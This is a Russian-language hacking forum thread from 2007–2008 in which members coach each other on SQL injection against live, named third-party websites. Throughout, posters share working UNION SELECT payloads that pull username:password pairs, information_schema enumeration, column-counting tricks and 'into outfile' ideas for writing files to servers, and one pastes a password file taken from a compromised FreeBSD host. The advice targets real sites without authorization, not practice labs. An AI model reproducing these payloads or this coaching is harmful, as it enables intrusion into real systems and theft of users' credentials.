RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 00:19:14.420000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: ZloiJoker
Может всетаки имеет смысл создать по моей теме отдельный топик ? (а то бардак какой то)
Вообще как то можно через SQL injecting mysql узнать какие там db т.е show databases;
Речь идет про 4 ку и Table 'information_schema.TABLES' doesn't exist
ну одну БД ты точно можешь узнать, запросом database(). а остальные только тупым перебором. Причем тебе еще нужно подобрать какую-нибудь таблицу из этой БД. например тебе приснилось, что там должна быть БД с именем DBNAME, и ты хочешь это проверить. Тогда тебе еще должна присниться какая-нибудь таблица из этой БД, и тогда смело пиши select … from DBNAME.TABLENAME;
Иначе, кроме как тупым перебором, никак, если нет information_schema.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 00:22:39.410000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: founder
Eсть урл вида ?id=1
Такая вещь на него не действует ?id=1', но действуте такая ?id=2-1, отображается то же что и при ?id=1. Все попытки узнать количество полей таким образом ?id=1+union+select+1,2,3,4,5,6… ?id=-1+union+select+1,2,3,4,5,6, увенчались тем, что отображается пустая страница. Это говорит о том, что хоть ?id=2-1 не проверяется, но применить иньекцию нельзя?
Пробывал и через ?id=1+order+by+50, то же пустая страница и никаких ошибок…, я понимаю, что если ошибка не отоборажается это ещё не значит, что её нет, но что можно ещё попробывать не знаю.
Может есть какие-нибудь соображения?
?id=1' - показывает то же, что и при ?id=1? или ничего не показывает? странные у тебя понятия, что считать "действует", а что нет.
попробуй эти 2 запроса:
?id=1+order+by+1/*
?id=1+order+by+100/*
и посмотри, что вывел каждый из них. Если при order+by+1 все как и при ?id=1, а при order+by+100 ошибка или просто никакого контента, то дальше подбирай.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 00:47:24.650000
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
А может быть, что на самом сайте нет админки? Никак не могу найти!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 10:07:30.216666
|
|
|
founder
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-05 18:10:47.093333
|
quote:
ORIGINAL: Dimonelite
quote:
ORIGINAL: founder
Eсть урл вида ?id=1
Такая вещь на него не действует ?id=1', но действуте такая ?id=2-1, отображается то же что и при ?id=1. Все попытки узнать количество полей таким образом ?id=1+union+select+1,2,3,4,5,6… ?id=-1+union+select+1,2,3,4,5,6, увенчались тем, что отображается пустая страница. Это говорит о том, что хоть ?id=2-1 не проверяется, но применить иньекцию нельзя?
Пробывал и через ?id=1+order+by+50, то же пустая страница и никаких ошибок…, я понимаю, что если ошибка не отоборажается это ещё не значит, что её нет, но что можно ещё попробывать не знаю.
Может есть какие-нибудь соображения?
?id=1' - показывает то же, что и при ?id=1? или ничего не показывает? странные у тебя понятия, что считать "действует", а что нет.
попробуй эти 2 запроса:
?id=1+order+by+1/*
?id=1+order+by+100/*
и посмотри, что вывел каждый из них. Если при order+by+1 все как и при ?id=1, а при order+by+100 ошибка или просто никакого контента, то дальше подбирай.
Я видемо не совсем правельно выразился.
1. ?id=1' - выводит то же, что и при ?id=1
2. ?id=2-1 - выводит то же, что и при ?id=1
3. ?id=1+order+by+1/* … ?id=1+order+by+1000/* нет ни какого контента и ошибок то же нет.
Как я понимаю 2-ой пункт говорит о том, что id не фильтруется или фильтруется частично, но как это в этоге применить пока не доходит, т.к. из пункта 3-го видно, что подобрать колличество полей не выходит.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 14:15:20.533333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: founder
Я видемо не совсем правельно выразился.
1. ?id=1' - выводит то же, что и при ?id=1
2. ?id=2-1 - выводит то же, что и при ?id=1
3. ?id=1+order+by+1/* … ?id=1+order+by+1000/* нет ни какого контента и ошибок то же нет.
Как я понимаю 2-ой пункт говорит о том, что id не фильтруется или фильтруется частично, но как это в этоге применить пока не доходит, т.к. из пункта 3-го видно, что подобрать колличество полей не выходит.
Уже из первого пункта следует, что id просто приводится к числовому значению (например функция intval в php), что и есть достаточная фильтрация в данном случае. Это НЕ уязвимость.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 14:53:57.280000
|
|
|
founder
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-05 18:10:47.093333
|
quote:
ORIGINAL: Dimonelite
quote:
ORIGINAL: founder
Я видемо не совсем правельно выразился.
1. ?id=1' - выводит то же, что и при ?id=1
2. ?id=2-1 - выводит то же, что и при ?id=1
3. ?id=1+order+by+1/* … ?id=1+order+by+1000/* нет ни какого контента и ошибок то же нет.
Как я понимаю 2-ой пункт говорит о том, что id не фильтруется или фильтруется частично, но как это в этоге применить пока не доходит, т.к. из пункта 3-го видно, что подобрать колличество полей не выходит.
Уже из первого пункта следует, что id просто приводится к числовому значению (например функция intval в php), что и есть достаточная фильтрация в данном случае. Это НЕ уязвимость.
Да может в хаке я не селён, но как приводятся строки к числовому значению вроде знаю. И если я приведу строку "5-1" к числовому значению, то получу 5, но ни как не 4. Если я в чём-то ошибаюсь, поправьте, плиз.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 19:38:02.713333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Логично. Надо подумать. Может быть просто при ?id=1 и ?id=2 выводится одинаковый контент?
Еще попробуй ?id=1qwe, если ничего не изменится, то точно туши косяк.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 19:53:07.816666
|
|
|
founder
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-05 18:10:47.093333
|
quote:
ORIGINAL: Dimonelite
Логично. Надо подумать. Может быть просто при ?id=1 и ?id=2 выводится одинаковый контент?
Еще попробуй ?id=1qwe, если ничего не изменится, то точно туши косяк.
1. Контент разный.
2. ?id=1qwe - ни какого контента не выводит.
х.з. чё они там понамутили)))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-06 22:54:50.796666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: founder
quote:
ORIGINAL: Dimonelite
Логично. Надо подумать. Может быть просто при ?id=1 и ?id=2 выводится одинаковый контент?
Еще попробуй ?id=1qwe, если ничего не изменится, то точно туши косяк.
1. Контент разный.
2. ?id=1qwe - ни какого контента не выводит.
х.з. чё они там понамутили)))
ну теперь попробуй
1. ?id=1+and+1=1
2. ?id=1+and+1=0
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-13 17:57:13.566666
|
|
|
arp123
Сообщений: 10
Оценки: 0
Присоединился: 2007-12-13 17:49:15.820000
|
нашел сайт, на котором используется MySQL 5.0.45-log. есть возможность узнавать имена таблиц и столбцов (information_schema), чтобы узнать имена столбцов в конкретной таблице её имя для условия where приходится переводить в HEX вид. как можно получить содержимое таблиц? запрос типа -1/**/union/**/select/**/1,2,3,4,имя_столбца/**/from/**/имя_таблицы/* не выдает результатов… ЧАРить пробовал, ХЕКСировать пробовал, не помогает.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-13 19:35:30.576666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Limit попробуй в конце дописывать.
Limit 0,1
Limit 1,1
и т.д.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-13 20:02:21.443333
|
|
|
arp123
Сообщений: 10
Оценки: 0
Присоединился: 2007-12-13 17:49:15.820000
|
quote:
ORIGINAL: Dimonelite
Limit попробуй в конце дописывать.
Limit 0,1
Limit 1,1
и т.д.
я наверное не полностью вопрос описал. у меня нет проблем с получением названия столбцов для конкретных таблиц, там разом выдаются названия всех столбцов для конкретной таблицы. проблема в том, что когда пишу что-то вроде -1/**/union/**/select/**/1,2,3,4,concat(username,char(58),password)/**/from/**/users/* сайт ничего ен выдает. и ещё, когда вывожу информацию из information_schema, то над названием столбца/таблицы видна цифра 4 (выборка так происходит) и уже под ней текст ошибки, а вот когда пытаюсь вывести информацию (логин:пароль) то появляется только текст ошибки, может это свидетельствует о том, что запрос неправильно составлен? или может в этой версии MySQL решили бороться с SQL инъектами "на корню"?
к слову, я думал использовать into outfile, но права на запись судя по всему есть только для зарегистрированных пользователей в папке с аватарами, но вот проблема, форум находится в другой директории (в другой chmod среде судя по всему) но ан этом же сервере. есть ли какой-нибудь способ найти директорию в которой были бы права на чтение и на запись наверняка?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-15 14:12:47.160000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Есть несколько вариантов, почему не хочет выбираться username,password из users
1)такой таблицы нет :)
2)есть такая таблица, но не в текущей БД. Для этого когда выбираешь table_name,column_name from information_schema.columns, еще выбирай и table_schema (т.е. название БД, в которой находится эта таблица, например superdbname) тогда потом пиши select … from superdbname.users
3)В этой таблице нет записей вообще. т.е. пустая таблица
4)Кодировка
вот этот пункт особенно важен.
возможно кодировка данных в таблице users отличается от кодировки данных в запросе, в который ты внедряешься. Попробуй
функции aes_encrypt и aes_decrypt соответственно. Про них уже давно писалось в журнале
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-16 00:43:03.170000
|
|
|
arp123
Сообщений: 10
Оценки: 0
Присоединился: 2007-12-13 17:49:15.820000
|
Dimonelite, спасибо большое!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-16 18:01:16.650000
|
|
|
arp123
Сообщений: 10
Оценки: 0
Присоединился: 2007-12-13 17:49:15.820000
|
кстати, если используется aes_decrypt()/aes_encrypt(), то как будет выглядеть синтаксис команды UPDATE? например, если запрос имеет вид: -1/**/union/**/select/**/1,2,3,4,aes_decrypt(aes_encrypt(concat(head,char(58),text),0x71),0x71)/**/from/**/news/**/where/**/id=0x31/*. подскажите пожалуйста.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-16 22:52:23.276666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
UPDATE и UNION не совместимы. И в подзапрос UPDATE тоже не засунешь. Так что ответ: никак не будет выглядеть :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-18 01:54:30.596666
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
А если скрипт дырявый полностью, то есть заходишь а там уже во всю скули по всему экрану…что с этим можно сдеать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-18 10:45:44.403333
|
|
|
dos 999
Сообщений: 331
Оценки: 0
Присоединился: 2007-12-17 10:49:07.556666
|
Смотри какой запрос, сравнивай с текущес строкой адреса, анализируй вобщем.
И думай куда тебе воткнуть свою часть запроса. Но сначало тебе нужно вылезти на страницу которая хоть что то отоьражала иначе как ты увидишь данные.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-24 01:08:52.580000
|
|
|
t3rmin41
Сообщений: 245
Оценки: 0
Присоединился: 2007-11-12 14:06:01.393333
|
Посылая серверу через браузер "левое" значение переменной sess=` получил вот это:
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/maksimx/domains/himland.ru/public_html/chat/include/chat.inc:19) in /usr/home/maksimx/domains/domain.name/public_html/chat/index.php on line 136
document.write ('')
<frame src=/index.php?sess=`>
Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0
Просканив XSpiderom, я нашёл что на порт 3306
"подключение к MySQL серверу с неавторизованного адреса запрещено"
Можно ли посмотреть какие таблицы и(или) поля там есть или нет? Что для этого нужно сделать?
Буду рад любой помощи =)
Update: да, забыл ОС - FreeBSD-20040419 (это выдал тот же XSpider) версия Apache - Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e PHP/4.4.4 FrontPage/5.0.2.2510
Если нужна какая-нибудь дополнительная информация, предоставлю что смогу.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-24 22:49:41.653333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Если это и можно считать ошибкой, и даже если это и можно как-то использовать, то к sql-инъекциям это точно никакого отношения не имеет.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-25 00:19:04.603333
|
|
|
t3rmin41
Сообщений: 245
Оценки: 0
Присоединился: 2007-11-12 14:06:01.393333
|
Да? Ну что ж, может это можно использовать как XSS… Спасибо, что хоть сказали, в каком направлении не надо плыть =)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-25 14:14:15.056666
|
|
|
лЕха
Сообщений: 4
Оценки: 0
Присоединился: 2004-10-01 17:21:03
|
Где можно потренироваться в sql-inj? на многих сайтах кавычки фильтруются и прочие приемы, новичку сложно разобраться. Подскажите скрипты: чатов, cms и т.п. где есть примитивные sql-inj. Я хочу на локалхосте сначала потренироваться.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-25 14:20:32.370000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: лЕха
Где можно потренироваться в sql-inj? на многих сайтах кавычки фильтруются и прочие приемы, новичку сложно разобраться. Подскажите скрипты: чатов, cms и т.п. где есть примитивные sql-inj. Я хочу на локалхосте сначала потренироваться.
http://milw0rm.com/search.php
Пишеш SQL inj выбираешь че понравится ..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-27 09:47:33.690000
|
|
|
usr.leon
Сообщений: 2
Оценки: 0
Присоединился: 2007-12-26 17:44:27.793333
|
имеется инжект
запрос:
http://www.host.ru/gallery/?show=gal&id=2+union+select+1,2/*
без ошибок, но id там используется 2 раза поэтому вторая ошибка возникает
http://www.host.ru/gallery/?show=gal&id=2+union+select+1,2,3,4,5,6/*
тут наоборот первая ошибка появляется вторая пропадает.
Собственно проблема в том что по всей видимости из результата поля берутся по именам и в странице ничего интересного нет (заюзать user() version() database() не получается)
Теоретически надо бы скинуть into outfile, но кавычка в запрос попадает экранированной.
Можно всетаки тут чемто поживиться или бросить и искать другой инжект?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-27 17:21:17.466666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Попробуй
id=-2+union+select+1,2,3,4,5,6/*
а то похоже ты забываешь свести на нет результат первого запроса(а именно в этом случае будет выводиться результат union'a)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-28 18:04:53.263333
|
|
|
Oz_55
Сообщений: 2
Оценки: 0
Присоединился: 2007-12-28 17:59:57.340000
|
народ подскажите пожалуйста что с этим можно сделать?
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin adm:*:1000:0::/usr/local/www:/bin/sh
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
adm:*:1000:0::/usr/local/www:/bin/sh
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-28 20:12:58.376666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Это в раздачу слонов запихать можно
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-28 20:15:32.266666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Pashkela
Это в раздачу слонов запихать можно
А какого фига его туда пихать?Там всёравно нефига интересного[&:]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-28 20:30:06.506666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
А что, в слонах когда-то было что-то интересное?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-28 20:32:40.650000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Pashkela
А что, в слонах когда-то было что-то интересное?
Были наполовину проведённые sql-inj! Это более интересно чем пустой /etc/master.passwd
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-30 14:27:21.186666
|
|
|
usr.leon
Сообщений: 2
Оценки: 0
Присоединился: 2007-12-26 17:44:27.793333
|
2 Dimonelite
О! Спасибо, я чувствовал что истина гдето рядом :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-31 00:54:59.560000
|
|
|
Oz_55
Сообщений: 2
Оценки: 0
Присоединился: 2007-12-28 17:59:57.340000
|
а почему на половину и как их закончить до конца?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-01 20:32:04.640000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Oz_55
а почему на половину и как их закончить до конца?
Посмотрите на название темы, которую вы засираете, и прекращайте оффтопить!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-04 02:02:37.940000
|
|
|
NoNameON
Сообщений: 1
Оценки: 0
Присоединился: 2008-01-04 01:56:58.470000
|
Помогите разобраться с http://www.lolbot.ru/content.php?z=-1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-04 11:38:46.230000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: ReJiSeR
запёрся тут йа есть сайт, там есть уязвимостьhttp://www.pocomaxa-extreme.ru/content/project.php?id=4+union+select+1,2,3,4,/*кол-во полей не находит о_О чо делать? памагите люди знающие!!!!!!!!!
перебрал до 4 и все? дальше типа не можешь? там 8 полей, прикинь? Хотя ничего интересного я там не увидел. Инъекция провальная, если ты конечно заранее не знаешь имена интересных и заведомо присутствующих там таблиц
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-04 14:55:40.120000
|
|
|
dos 999
Сообщений: 331
Оценки: 0
Присоединился: 2007-12-17 10:49:07.556666
|
quote:
перебрал до 4 и все? дальше типа не можешь? там 8 полей, прикинь? Хотя ничего интересного я там не увидел. Инъекция провальная, если ты конечно заранее не знаешь имена интересных и заведомо присутствующих там таблиц
Агам… прав типо нет[>:]
Error 1044: Access denied for user 'pocomaxa'@'localhost' to database 'INFORMATION_SCHEMA'
ReJiSeR на будущее количество полей проверяй сортровкой, а не тупым перебором… ибо, намного эфективнее и быстрее. Н-р вот!
http://www.pocomaxa-extreme.ru/content/project.php?id=4+order+by+8–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-04 17:31:02.883333
|
|
|
LeXeR_SS
Сообщений: 4
Оценки: 0
Присоединился: 2008-01-04 17:24:25.740000
|
Я новенький и хочу научить скул инжекту но чето пока не могу сайт найти нормальный где это можно осуществить =)
посмотрите можно ли здесь что-то сделать? у меня ничего не выходит… может я неправильно ищу сайты…
http://www.mercuries.ru/c_index.php?no=13'
http://www.happyland-drink.ru/brands.php?id=-1+order+by+29/*
и есть ли какая-то раздница между тем что ставить в конце… /* или –
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-05 20:03:30.660000
|
|
|
Drunk
Сообщений: 8
Оценки: 0
Присоединился: 2007-02-01 19:14:15.990000
|
а у меня вопрос: как можно узнать названия полей и таблиц с помощью information schema вы чтото подобное писали но я никак разобраться не могу.
+: Леха учже спрашивал типа как можно потрениться в скл инжектах - есть ли специальные сайты для этого. ктото дал адрес милворма - там експлоиты - собственно нафиг они нам ? нам нужен типа сайт с уже заложенной уязвимостью и где расписано как можно ее реальзовать.
С извинениями, я
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-01-05 23:17:05.390000
|
|
|
EXIBIT
Сообщений: 89
Оценки: 0
Присоединился: 2007-05-21 21:04:39.376666
|
ребята интерсно решение такой проблемы/
есть сайт ,по запросу
http://www.сайт.com.ua/continents/continent_m.php?ID=1'&CID=1
выводит
064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND TYPE.TYPEID=BLOCK.TYPEID AND LANGUAGE_ID=448' at line 1
strSQL= SELECT BLOCK.*,TYPE.NAME AS TYPENAME FROM TYPE,BLOCK WHERE CATEGORYID=1 AND PARENTID=1\' AND TYPE.TYPEID=BLOCK.TYPEID AND LANGUAGE_ID=448
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/algol/www/dbclass.php on line 84
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
strSQL= SELECT NAME FROM IBCOUNTRIES WHERE COUNTRYID=1\'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/algol/www/dbclass.php on line 77
подскажите как дальше дейстовать, и второй вопрос и что можно сделать дальше исходя из этой уязвимости? только начинаю осваивать искусство sql)—[&:]
|
|
|
|
|
|
